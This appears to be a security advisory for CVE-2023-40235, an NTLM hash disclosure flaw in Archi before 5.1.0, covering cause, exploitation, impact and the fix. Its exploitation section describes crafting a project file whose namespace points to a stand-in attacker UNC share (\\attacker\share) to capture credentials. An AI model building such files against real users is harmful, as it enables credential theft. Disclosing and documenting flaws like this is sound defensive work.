CVE-2023-40235

Vulnerability

Archi versions before 5.1.0 contain an NTLM hash disclosure vulnerability when parsing a maliciously crafted ArchiMate project file (.archimate). The issue lies in the unsafe default configuration of the Eclipse Modeling Framework (EMF) [4], which allows the XML parser to load external resources specified in the XML namespace (XMLNS) attribute. If the namespace URL does not match the expected ArchiMate URL, the parser attempts to access the provided resource, even if it is a UNC path [1][2]. The affected versions include all releases prior to 5.1.0 [1].

Exploitation

An attacker must craft a .archimate file with an XMLNS attribute pointing to a UNC path (e.g., \\attacker\share) that does not allow guest access. The victim must open this file in Archi. No authentication or special privileges are required beyond file access. When the file is parsed, the victim's system attempts to authenticate to the attacker's share using the current user's NTLM credentials, thereby disclosing the NTLM hash over the network [2].

Impact

Successful exploitation allows the attacker to capture the NTLM hash of the authenticated user. With the hash, offline password cracking can be performed to recover the plaintext password, potentially leading to unauthorized access to the victim's system or network resources [2]. This is a credential disclosure vulnerability that compromises user authentication secrecy.

Mitigation

The vulnerability is fixed in Archi version 5.1.0 [1]. The fix, implemented in commit bcab676 [3], disables the EMF option OPTION_USE_PACKAGE_NS_URI_AS_LOCATION to prevent the parser from loading unregistered namespace URIs. Users should upgrade to version 5.1.0 or later. No workaround is available for earlier versions.